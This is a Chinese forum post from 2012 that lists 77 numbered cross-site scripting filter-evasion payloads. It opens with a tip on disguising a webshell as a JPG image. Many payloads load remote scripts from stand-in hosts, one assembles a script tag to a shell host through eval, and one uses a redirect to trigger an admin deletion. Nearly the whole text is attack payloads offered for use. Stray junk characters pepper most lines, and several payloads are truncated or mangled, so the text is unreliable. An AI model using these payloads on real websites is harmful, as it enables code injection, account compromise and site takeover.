跨站图片shell, L& k, U" l" z6 J9 ` b" {! a
XSS跨站代码 <script>alert("")</script>
. C/ m/ a6 Y% m) R, [/ a( s
4 r/ p, T- W( a4 x7 E! L. t9 [将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马/ N& W+ ]9 ^7 e4 x8 k' c& T; ~
, s4 Q3 E" ]. Y
- U8 V I/ Z0 V3 d" J% B( h% |
, r+ x3 G2 u; c/ u0 m3 D/ g1)普通的XSS JavaScript注入/ o0 H, ?7 F3 _# `8 {7 G7 K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; |) m$ r) s/ c/ e! n, s
, d7 O" }$ R$ ^- U/ n- l5 O- `: Z(2)IMG标签XSS使用JavaScript命令9 |% u& L X% B) }# R% _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 I. L7 H& Q# | u# ]& _" p9 t/ w6 S5 I
8 p! ]# T* w# p# o" @$ A' z! [(3)IMG标签无分号无引号6 Y V& X; }' E- r x
<IMG SRC=javascript:alert(‘XSS’)>
1 W- e5 K3 ~6 l. t( v' Z$ q% n( F% W _: N T& O
(4)IMG标签大小写不敏感% x' {. K: u& Y) z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>* P% ^9 m. U: x5 g# s
" c# @/ {! S5 N( h5 P; B(5)HTML编码(必须有分号)
/ E( H4 m/ H" }<IMG SRC=javascript:alert(“XSS”)>
; _: `$ [- C$ I+ H+ u2 z$ R# @; C4 ?* w$ y6 z- p2 x
(6)修正缺陷IMG标签
/ C/ i% N" e1 q4 G2 |<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>' A! `4 E8 r' p# c" L4 Z
2 ^. ?6 m0 t" b S2 C0 \9 `
(7)formCharCode标签(计算器)2 a" n- x; D( k4 \
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>- [. m* B7 S' \ D* o6 U
, K5 x5 z) ]# d( G# s2 Z! O(8)UTF-8的Unicode编码(计算器)! g" {. P, w7 Z9 E& G* V2 l( \
<IMG SRC=jav..省略..S')> k( m0 U3 C: E5 n3 {; T9 Z/ f+ b1 R x
/ g2 _& E4 y# O8 [# {
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 N# ~, ?! B# R0 b, y: q; B1 ~8 O
<IMG SRC=jav..省略..S')>
8 l9 ~, Z+ ?4 p" p; c
{- H2 p0 d- c, Y3 g(10)十六进制编码也是没有分号(计算器)4 k0 X' ?" o0 v, b
<IMG SRC=java..省略..XSS')>
' C5 @6 `6 o5 i
, Q0 {" S/ F) E9 j9 j2 `(11)嵌入式标签,将Javascript分开
- H( m4 `: k) i$ c. i8 y<IMG SRC=”jav ascript:alert(‘XSS’);”>
- O8 @0 c0 b" {* R
% m/ O% F2 X6 ?(12)嵌入式编码标签,将Javascript分开3 O& ^) y; F" t: P7 Q: a6 `
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 g% q6 P3 v ^# ?
$ o6 f( `( J' \6 [2 [5 m1 a3 l" g(13)嵌入式换行符
( ^$ O- {4 K% G# j<IMG SRC=”jav ascript:alert(‘XSS’);”>" `* }. B/ C ^( j1 c
" k, ? \, |) _8 |0 t ]3 N% L/ H, Q
(14)嵌入式回车
1 [ P2 \- a, v2 X5 \) k5 {<IMG SRC=”jav ascript:alert(‘XSS’);”>$ f% B# l, j- M9 P8 Z
7 M& _& q6 h' K& ]3 S: _! r(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 Q/ \0 ^! ?6 u3 A7 P# ~' ]( C<IMG SRC=”javascript:alert(‘XSS‘)”>! N3 i! q) D {& v3 R4 \8 V3 J+ ~' E
$ L; m* b3 g' P' x
(16)解决限制字符(要求同页面)( B! a! J2 {% y( O* ]5 h8 k
<script>z=’document.’</script>3 |' K2 m( Q1 N+ Q; @& Q
<script>z=z+’write(“‘</script>6 }4 p8 C0 ^7 D3 ~. k
<script>z=z+’<script’</script>1 {6 q/ M: C( c! T" B3 K) |/ g
<script>z=z+’ src=ht’</script>4 g. @, q- ~; {' `5 Z
<script>z=z+’tp://ww’</script>
' V6 n' l% b0 ]% Z- C3 s<script>z=z+’w.shell’</script>$ z6 x$ n& ^$ M/ w
<script>z=z+’.net/1.’</script>; s' x! t# v0 u g9 o# e9 S a# F
<script>z=z+’js></sc’</script>. j# G9 B* K4 ^5 w" Q. I. D C E( `
<script>z=z+’ript>”)’</script>
3 s2 D0 K/ x \+ y+ l3 M+ x<script>eval_r(z)</script>
& N9 F, a* o7 `
5 u" \8 w0 g- f* s(17)空字符
; f2 a" N* g N! K4 b. h% Sperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 H7 ]' E( ]- b( j& m( Y
+ V$ ~; p- B# }) E" {(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) X, b" K5 z' S1 Z4 O
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 x' Q& D5 j6 K7 S! ^
7 g1 e$ T$ O( _8 F8 v% L(19)Spaces和meta前的IMG标签, Z9 z$ g- S+ O; Y) G* ?: S
<IMG SRC=” javascript:alert(‘XSS’);”>
) v+ C" u* i4 l" r8 }6 v
" }- E; I4 k& m( ]7 F5 r(20)Non-alpha-non-digit XSS
$ `: A* N9 k% O/ b$ `- p+ t1 p$ n<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, f6 ~/ E8 q7 ?9 G& z8 J) d4 r; g' A! [) Q7 f! }
(21)Non-alpha-non-digit XSS to 2. c' q2 y5 y: q, H- {& B/ I2 {$ ]8 c! P
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 U( S0 h1 n/ r- P3 J4 j0 ~! U" ^8 u c1 y
(22)Non-alpha-non-digit XSS to 3
8 l! h |! v- C& F& z$ E<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
G! ]; Z5 e" A$ {
$ J0 a# t, Y9 p6 _* \0 e(23)双开括号! l ~$ N5 P, {4 J1 _
<<SCRIPT>alert(“XSS”);//<</SCRIPT>$ c" u0 e4 j3 `/ i3 y) B- ^+ ^
c R, A9 C; U4 w$ ?# R7 d
(24)无结束脚本标记(仅火狐等浏览器)3 R6 r/ Z% X( n @
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' |" N4 u7 T5 L6 i
/ b/ o# x; R. v8 }3 {: X1 n8 H4 a; f5 `(25)无结束脚本标记2
, R: `- j3 _/ F# m0 E0 m. j<SCRIPT SRC=//3w.org/XSS/xss.js>
+ w2 ^+ w4 p' M# ~, [' U& e2 {
# b& m* r/ \ F' Y(26)半开的HTML/JavaScript XSS
/ M# g: O5 t3 `/ a6 r1 G<IMG SRC=”javascript:alert(‘XSS’)”
# j. y3 p1 B# F4 C
, q0 Y" p0 ~: T' E3 I(27)双开角括号0 {) f, @' ?! y; ? Q0 T( L) A
<iframe src=http://3w.org/XSS.html <
) C! }5 r8 c% g# V$ g! T
! c4 ?0 g% h+ f7 u1 [ W5 K, W9 ~(28)无单引号 双引号 分号
. ~& N' ^) o! `6 |% n4 h<SCRIPT>a=/XSS/2 ]5 G" O P7 k6 `; }- S. i
alert(a.source)</SCRIPT>! w8 R0 S! D' E. ^. T/ v
& L# u0 e3 P$ _8 R5 X3 h
(29)换码过滤的JavaScript
* ~/ _/ F( y) o6 L& Y9 s\”;alert(‘XSS’);//
$ o# g% ~; q+ P) v4 Y0 ?" J% F4 J( P, [) ^1 i
(30)结束Title标签
0 N! q7 [9 p' e$ v$ P</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 j6 i, h6 ^5 ]3 k: f' @+ ^' _
; p4 S/ ]5 r: e6 y% s(31)Input Image
- `6 I1 w( I9 j% B! B<INPUT SRC=”javascript:alert(‘XSS’);”>, \0 @7 [& m/ u4 ]3 A
) p4 h1 h, i. g) _1 c3 i(32)BODY Image- L4 J3 k5 d" t- x1 v8 U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>" _5 h3 O* u- `+ c
1 W9 ~1 t: r0 F; r' w(33)BODY标签
" b# b, j& f! m" y<BODY(‘XSS’)>
. s; z0 o3 |: J8 w# n) M4 p" v4 t% d% H; V6 Y" Y/ P
(34)IMG Dynsrc
; X' I0 n T s' |/ c<IMG DYNSRC=”javascript:alert(‘XSS’)”>" P8 Z5 p" w L J1 d) ]: H0 \+ w* p
3 n3 @4 V' `/ O(35)IMG Lowsrc2 K9 K1 _5 A4 m
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
+ |6 F# n* {3 U# f* p, c# e$ b# m+ _( b2 H5 Y# S5 J: V1 K
(36)BGSOUND( _1 [) J. R. T N
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 U& B" |/ W' p' c; S& ~9 D
4 j$ Y! z4 \$ c3 ?(37)STYLE sheet2 G: a" R, k; T3 v
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ Z6 _8 B) V$ W6 i9 l
4 T' Q' T4 }* g! D9 C) C(38)远程样式表& ]/ L, F9 Z& E
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 k! ^6 J! h& O" A) S) T, S; E% ~2 O" i) Y
(39)List-style-image(列表式)
9 `2 ?- M( e' {/ Q9 X9 t<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
7 z A! B) t! d; @/ g$ e3 W6 c4 R) y% o5 S
(40)IMG VBscript3 ^2 ] Q P. d$ G) B) b$ ~/ z
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS) \, A) y# p0 _* w& A
: j: G; s! h/ ^ }2 z( @
(41)META链接url
0 A+ e% i* g' A" G<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
: b9 g- B7 J# m' P' }% r4 I x. H+ w* Q0 [ k* \ w& f
(42)Iframe
7 g( @& q J5 b+ G<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>9 o9 n/ Z& `# l
(43)Frame' r! H$ X' t- p) N- u
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- H( p0 e: g9 ]: _5 {. |
! @ w+ B4 i! H* k' R(44)Table
0 q' g; K' F( {<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ G* F6 g2 K. y/ O' I, i" K" |
5 r2 M; C L: j# U* }, \. k4 k' K(45)TD
* _, u0 G. m2 f X8 d0 \$ m<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 m0 C3 M+ S1 c
2 U, v8 z6 O) f1 B, |(46)DIV background-image; D; ^/ n; q4 ]; {- Z' ^! g9 f
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 |' r. Q( @+ t8 e8 V' Q
! w7 C& T/ [. B- ]
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)4 b( P/ v; R5 l8 x. V P b! u
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
% k7 Z2 N6 N+ Y0 K6 p U3 Y9 C: v" T
' V, s% Q5 z" X* X* M6 M% ~(48)DIV expression; Z0 H" z8 H) Y' ?/ w
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
8 _9 Q, ]+ G4 `
7 M/ @* H( H6 _- o6 E+ g(49)STYLE属性分拆表达% f+ X h- @# B( [& ~
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 y* t) w, W& s2 ^
: H2 V7 P6 d5 e q: w7 M(50)匿名STYLE(组成:开角号和一个字母开头)6 s$ ?' Y9 k- k
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>) n3 o( u( p3 O6 H1 J, H8 |6 t
! p! {9 I" b: M- n2 W& g9 j! f
(51)STYLE background-image$ Z% X4 D0 r2 g# K2 D% q& x7 u8 S! x
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>3 q" N, F% R2 f7 } s
# ?" F% F6 Q+ v- E(52)IMG STYLE方式4 i0 U" |, ^0 F& }1 X
exppression(alert(“XSS”))’>
0 @7 b- o. Z) u! Y0 D9 q9 |, D4 x/ k& i7 B2 ~1 V* ~' x
(53)STYLE background) g/ C7 L9 N- k# S/ B, G
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* G9 X( {" @6 ~
: l u: i) t" V- v1 w2 Z7 Y9 e(54)BASE
5 d. {$ l6 R) M& b$ o& y( {' w6 N<BASE HREF=”javascript:alert(‘XSS’);//”>
. d0 v3 R7 _# ^0 P! h# Z- h
# I- ^4 G+ L! S. ?0 Z2 x(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ F# _; ?$ O! W& E# V9 W
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' D# H; K/ V# x
, E) t Q; ^ z7 c
(56)在flash中使用ActionScrpt可以混进你XSS的代码6 W9 b5 _! A9 b
a=”get”;
9 y; M" O/ k2 }+ G5 {b=”URL(\”";7 H% {' _! a; o
c=”javascript:”;
3 C$ V6 P2 F8 g k& U- ?d=”alert(‘XSS’);\”)”;
: T( G' r' y. ~) xeval_r(a+b+c+d);* j" j7 v3 r& t3 y; k
5 r3 ]9 k0 F8 N6 P" V- m' E. t(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
3 B# p+ O0 C# J7 N/ y+ M<HTML xmlns:xss>
' y3 P/ [. j" i& L/ x) D: \5 {* ~<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: ?7 t( X7 }& @<xss:xss>XSS</xss:xss>) p$ R9 l( T; f
</HTML>8 @# ^# C6 V/ N% Y
8 ?. I% ^" Q/ l, k z8 h(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. L P% D2 X; C+ X4 R<SCRIPT SRC=””></SCRIPT>
' L; D5 ]+ p/ A) }; o8 {1 q0 r- ]& B6 w
(59)IMG嵌入式命令,可执行任意命令
8 d/ m) B+ D8 r$ O% v% b7 W<IMG SRC=”http://www.XXX.com/a.php?a=b”>
( F. E/ {; N8 I8 y' y$ L) L. O" ~, F: x6 r# Q `
(60)IMG嵌入式命令(a.jpg在同服务器)9 g/ [; U, O1 p8 ]9 B& `. g* N
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
3 I, T' v4 j/ q5 l3 G9 L$ X
# t t0 m, M5 p* ?/ Z* v. E' r4 ](61)绕符号过滤
' y* _7 |) j1 p4 b2 @" S<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ P, u3 ]3 _; {& ]2 N# I4 \% k
; d! r1 K9 l' k' e; `$ @(62)
& w2 b; J9 x" N( v8 n<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' a" m) P; X- R- i$ K# ` ?) ^% V7 j. b$ Q' n2 x
(63)
% {, y$ W {4 ~# d+ {! B6 T<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 L: ]' h: @1 S: j* L( K: n4 ]/ X! M4 v% n
(64)5 `) N7 J( G0 L3 o8 a9 @" {
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 |4 J$ Q! O9 E8 F" z
: p" j6 n! O& z. A0 Q$ a( r
(65)& n* N; a% v* C# D2 h3 H3 g
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
7 }: x% b% ]3 M
6 e# U7 {6 d$ y: b- m, i w4 c, w(66)
( b4 L8 J& f) |- k* E' `( D<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>" C$ V$ I) d& O
# n$ Z* P6 O! t$ S7 m(67)1 l8 p2 O+ u- t0 `2 u! r
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>- K* |6 ^0 ?; `8 L/ h0 k
& K; ^3 l; H! Y7 H& [(68)URL绕行
8 }# u* A0 e' b: M) @" L<A HREF=”http://127.0.0.1/”>XSS</A>9 l$ z, t+ n. ]4 E# C# \2 }' x! I! @
- s! |/ i+ J, B, c. T+ O
(69)URL编码
2 G: ~. Z" A7 @* ?- |! M6 M& ~, R<A HREF=”http://3w.org”>XSS</A>- S' i0 e- ?; ?: T
0 [. E, b* ?/ N
(70)IP十进制
' T9 m T& g! D7 h) o<A HREF=”http://3232235521″>XSS</A>; n: D- B V4 W# o. k7 g" j2 H
7 ~+ W- _2 R& Q$ i: ~' U z(71)IP十六进制* o( [. @7 i7 [( n+ m3 _" |
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
1 [ O) c( o% A, Q
0 V/ Y% m! @5 h* K' N$ w' E(72)IP八进制
# ]; j# w% ~2 A/ l<A HREF=”http://0300.0250.0000.0001″>XSS</A>
2 o7 A' Q. Y8 w: g& f8 C
7 O4 U$ Z, Z/ ]+ H8 f$ v7 [" l& W(73)混合编码. ~2 }" Y b: j! A$ A" ]
<A HREF=”h
* i! K+ e9 J* a( d! f; U8 Ttt p://6 6.000146.0×7.147/”">XSS</A>1 g% W/ ]/ C& o
' l, ^! \" x. L1 a. Z(74)节省[http:]$ w7 ]; n% N. X/ R
<A HREF=”//www.google.com/”>XSS</A>3 o0 H d# @' y" b7 h
5 l7 J/ L* \, {
(75)节省[www]
' |; Z8 q3 E6 s" P" w# g<A HREF=”http://google.com/”>XSS</A>
* I, Y7 }) L3 j( K" k
7 n/ J5 Z( }& }; a8 s3 I& a(76)绝对点绝对DNS1 F, B9 g, A$ ] E7 o. Y
<A HREF=”http://www.google.com./”>XSS</A>6 R0 z0 a3 c, e& a: J; y; u
: ]0 \9 J7 k$ j" W f; C f1 M/ I, ^, ^6 X(77)javascript链接
7 h, W8 v+ o( S1 c" U<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
& _6 W. Y3 P1 G( ~* f. ] |
发表于 2012-9-13 17:04:56
收藏
支持
反对